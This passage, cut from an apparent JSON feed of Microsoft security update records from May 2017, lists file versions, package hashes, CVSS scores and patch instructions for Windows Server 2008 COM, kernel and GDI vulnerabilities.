07-Apr-2017| 16:35| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:39| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:40| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOleres.dll.mui| 
6.0.6002.24089| 20,480| 07-Apr-2017| 16:35| Not applicable| Not applicable \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform**| **Service branch** \n---|---|---|---|---|---|--- \nAdvapi32.dll.mui| 6.0.6002.19598| 380,928| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:17| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 401,408| 06-Feb-2016| 04:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 266,240| 06-Feb-2016| 02:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 02:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 376,832| 06-Feb-2016| 04:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 03:28| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 04:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:04| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:14| Not applicable| Not applicable 
\nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 04:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:11| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 356,352| 06-Feb-2016| 03:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 348,160| 06-Feb-2016| 04:33| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 380,928| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:49| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 401,408| 07-Apr-2017| 16:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 266,240| 07-Apr-2017| 15:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:46| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 376,832| 07-Apr-2017| 16:29| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:42| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not 
applicable| Not applicable\n", "cvss3": {"exploitabilityScore": 0.8, 
"cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Windows COM Elevation of Privilege Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0244"], "modified": "2017-05-09T07:00:00", "id": "KB4018556", "href": "https://support.microsoft.com/en-us/help/4018556", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T14:39:35", "description": "None\n## Summary\n\nAn information disclosure vulnerability exists when the Windows kernel handles objects in memory incorrectly. An attacker who successfully exploits this vulnerability could obtain information to further compromise the user\u2019s system. \n \nTo learn more about the vulnerability, go to [CVE-2017-0220](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-0220>).\n\n## More Information\n\nImportant \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4018821>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4018821-ia64.msu| B8ECB73E699059F0F5C79E745E86CD34AA168A5D| D2B5077D87A39B40833961529E3ED45FA68C0E063CDFA4B3502FFF15178F041D \nWindows6.0-KB4018821-x64.msu| 7FC26196E33CADEE355BE64D64386F180C786DFE| 78A34D40A2B3C7DE99D4860DB1EA47FC718377A90C2F069F63B482F92B406DD5 
\nWindows6.0-KB4018821-x86.msu| FD7962C2823A878BC2F8EBCE54FED2320AA47BB6| C0955D29940AED39E34B561596886FB5AFDCA065238F94F413F208C2224C835B \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. \n \n**Windows Vista and Windows Server 2008 file information** \n\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nTdx.sys| 6.0.6002.19762| 229,376| 04-Apr-2017| 14:41| IA-64 \nTdx.sys| 6.0.6002.24087| 229,376| 05-Apr-2017| 14:39| IA-64 \nAfd.sys| 6.0.6002.19762| 985,088| 04-Apr-2017| 14:42| IA-64 \nAfd.sys| 6.0.6002.24087| 985,600| 05-Apr-2017| 14:40| IA-64 \n \n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nTdx.sys| 6.0.6002.19762| 94,720| 04-Apr-2017| 14:58| x64 \nTdx.sys| 6.0.6002.24087| 94,720| 05-Apr-2017| 14:59| x64 \nAfd.sys| 6.0.6002.19762| 404,992| 04-Apr-2017| 14:59| x64 \nAfd.sys| 6.0.6002.24087| 404,992| 05-Apr-2017| 15:00| x64 \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nTdx.sys| 6.0.6002.19762| 72,192| 04-Apr-2017| 14:35| x86 \nTdx.sys| 6.0.6002.24087| 72,192| 05-Apr-2017| 14:35| x86 \nAfd.sys| 6.0.6002.19762| 273,408| 04-Apr-2017| 14:35| x86 \nAfd.sys| 6.0.6002.24087| 273,920| 05-Apr-2017| 14:36| x86\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "privilegesRequired": "LOW", 
"vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security Update for the Windows Kernel Information Disclosure Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0220"], "modified": "2017-05-09T07:00:00", "id": "KB4018821", "href": "https://support.microsoft.com/en-us/help/4018821", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T13:20:46", "description": "None\n## Summary\n\nAn information disclosure vulnerability exists when the Windows kernel handles objects in memory incorrectly. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system. \n \nTo learn more about the vulnerability, go to [CVE-2017-0175](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-0175>).\n\n## More Information\n\nImportant \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. 
When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4018885>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4018885-x64.msu| 34C9F60A1F71096FC09468A3B01D6F25BDC650C5| 700BACCAC756B6B9191DA6496DDD34EA409CC112A9881BCB6866DB7990BCF86C \nWindows6.0-KB4018885-ia64.msu| AACBF3F515589867E73BAFDD26B8F4E500F9D23D| 9C66687AAE18338951057577459EA0CC10C357135DEB5C1D53413DA1D9F28481 \nWindows6.0-KB4018885-x86.msu| F68E692B0B5AC3ED45071E808B296A60DA359A8E| BCF6ACC8F3427AD3135C1E5387544C527153F60535D0A2D9B16D0DA0475C284F \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the 
attributes that are listed in the following tables. \n \n**Windows Server 2008 file information** \n\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nTcpipreg.sys| 6.0.6002.18160| 40,448| 08-Dec-2009| 17:55| x64 \nTcpipreg.sys| 6.0.6002.24087| 40,448| 05-Apr-2017| 14:59| x64 \nTcpip.sys| 6.0.6002.19763| 1,422,568| 05-Apr-2017| 16:26| x64 \nTcpip.sys| 6.0.6002.24087| 1,416,424| 05-Apr-2017| 15:50| x64 \n \n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nTcpipreg.sys| 6.0.6002.18160| 79,360| 08-Dec-2009| 17:51| IA-64 \nTcpipreg.sys| 6.0.6002.24087| 80,896| 05-Apr-2017| 14:39| IA-64 \nTcpip.sys| 6.0.6002.19763| 2,950,376| 05-Apr-2017| 15:50| IA-64 \nTcpip.sys| 6.0.6002.24087| 2,976,488| 05-Apr-2017| 15:24| IA-64 \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nTcpipreg.sys| 6.0.6002.18160| 30,720| 08-Dec-2009| 17:26| x86 \nTcpipreg.sys| 6.0.6002.24087| 31,232| 05-Apr-2017| 14:35| x86 \nTcpip.sys| 6.0.6002.19763| 905,960| 05-Apr-2017| 16:02| x86 \nTcpip.sys| 6.0.6002.24087| 915,176| 05-Apr-2017| 15:30| x86\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Windows Kernel 
Information Disclosure Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175"], "modified": "2017-05-09T07:00:00", "id": "KB4018885", "href": "https://support.microsoft.com/en-us/help/4018885", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T13:21:34", "description": "None\n## Summary\n\nAn information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. \n \nTo learn more about the vulnerability, go to [CVE-2017-0190](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-0190>).\n\n## More Information\n\nImportant \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). 
\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4019206>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: [Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n### Update replacement\n\nThis update replaces previously released update 4017018.\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4019206-ia64.msu| 10270F2826B7CC7FA91A74F49C6C4A78B3C35CC1| 04C29C3B8BD69E9F9B222E548EEF593B3268C03B807280AC058B15133D5B475E \nWindows6.0-KB4019206-x64.msu| 61BE798760A569E48B6868CBA5A542AB26FCAE97| 064D4435D44F36B5A9963B554EC2A5220DDEBF335BFE763CC02BB4A63918EAAF \nWindows6.0-KB4019206-x86.msu| A250DB86107696DE0A9A9BE64EB93E29833C792B| A4161C6AAF43E16776E9BBAC2FF4989ED75270CE7B4210ABEC5D0289A8EE201F \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. 
\n \n**Windows Server 2008 file information** \n\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nGdi32.dll| 6.0.6002.19765| 955,392| 07-Apr-2017| 15:41| IA-64 \nGdi32.dll| 6.0.6002.24089| 954,880| 07-Apr-2017| 15:16| IA-64 \nGdi32.dll| 6.0.6002.19765| 305,664| 07-Apr-2017| 15:56| x86 \nGdi32.dll| 6.0.6002.24089| 305,152| 07-Apr-2017| 15:25| x86 \n \n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nGdi32.dll| 6.0.6002.19765| 391,680| 07-Apr-2017| 16:18| x64 \nGdi32.dll| 6.0.6002.24089| 391,680| 07-Apr-2017| 15:43| x64 \nGdi32.dll| 6.0.6002.19765| 305,664| 07-Apr-2017| 15:56| x86 \nGdi32.dll| 6.0.6002.24089| 305,152| 07-Apr-2017| 15:25| x86 \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nGdi32.dll| 6.0.6002.19765| 299,520| 07-Apr-2017| 15:54| x86 \nGdi32.dll| 6.0.6002.24089| 299,520| 07-Apr-2017| 15:23| x86\n", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "baseScore": 4.4, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Windows GDI Information Disclosure Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0190"], "modified": "2017-05-09T07:00:00", "id": "KB4019206", "href": "https://support.microsoft.com/en-us/help/4019206", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-31T14:40:44", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Security updates to Microsoft Graphics Component, Windows COM, Windows Server, Windows Kernel and Microsoft Windows DNS.\nFor more information about the security vulnerabilities resolved, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update. \n\n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4019214>) website.\n\n * **File information** \nFor a list of the files that are provided in this update, download the [file information for update KB4019214](<http://download.microsoft.com/download/E/9/5/E9550DB7-A799-49F5-AD1D-A3D8EF04D86A/4019214.csv>).\n\n## More Information\n\n * This Security-Only Quality Update does not include security fixes for Internet Explorer. In order to obtain the security fixes for Internet Explorer, the Cumulative Security Update for Internet Explorer KB4018271 should also be installed. 
Note that the Security Monthly Quality Rollup does contain security updates for Internet Explorer.\n * If you use update management processes other than Windows Update, and you automatically approve all security updates classifications for deployment, this May 2017 Security-Only Quality Update KB4019214, April 2017 Security Monthly Quality Rollup KB4019216, and the Cumulative Security Update for Internet Explorer KB4018271 are deployed. We recommend that you review your update deployment rules to make sure the desired updates are deployed.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "May 9, 2017\u2014KB4019214 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0077"], "modified": "2017-05-09T07:00:00", "id": "KB4019214", "href": "https://support.microsoft.com/en-us/help/4019214", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T14:40:51", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. 
No new operating system features are being introduced in this update. Key changes include:\n\n * Updated Windows Cryptography API to deprecate SHA-1 for SSL/TLS Server Authentication, including in Microsoft Edge and Internet Explorer 11. See [Advisory 4010323](<https://support.microsoft.com/help/4010323>) for more information.\n * Security updates to Microsoft Graphics Component, Windows COM, Microsoft ActiveX, Windows Server, Windows kernel, and Microsoft Windows DNS.\nFor more information about the security vulnerabilities resolved, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nSymptom| Workaround \n---|--- \nIf the PC uses an AMD Carrizo DDR4 processor, installing this update will block downloading and installing future Windows updates.| This issue is resolved by [KB4022722](<https://support.microsoft.com/help/4022722>). \n \n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4019263>) website.\n\n * **File information** \nFor a list of the files that are provided in this update, download the [file information for cumulative update KB4019263](<http://download.microsoft.com/download/8/A/1/8A1866D7-D539-42D2-A928-68C91B87BC49/4019263.csv>).\n\n## More Information\n\n * This Security-Only Quality Update does not include security fixes for Internet Explorer. To obtain the security fixes for Internet Explorer, Cumulative Security Update for Internet Explorer KB4018271 should also be installed. 
Note that the Security Monthly Quality Rollup does contain security updates for Internet Explorer.\n * If you use update management processes other than Windows Update and you automatically approve all security updates classifications for deployment, this May 2017 Security-Only Quality Update KB4019263, the May 2017 Security Monthly Quality Rollup KB4018271, and the Cumulative Security Update for Internet Explorer KB4014661 are deployed. We recommend that you review your update deployment rules to make sure the desired updates are deployed.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "May 9, 2017\u2014KB4019263 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0077"], "modified": "2017-05-09T07:00:00", "id": "KB4019263", "href": "https://support.microsoft.com/en-us/help/4019263", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T14:40:39", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. 
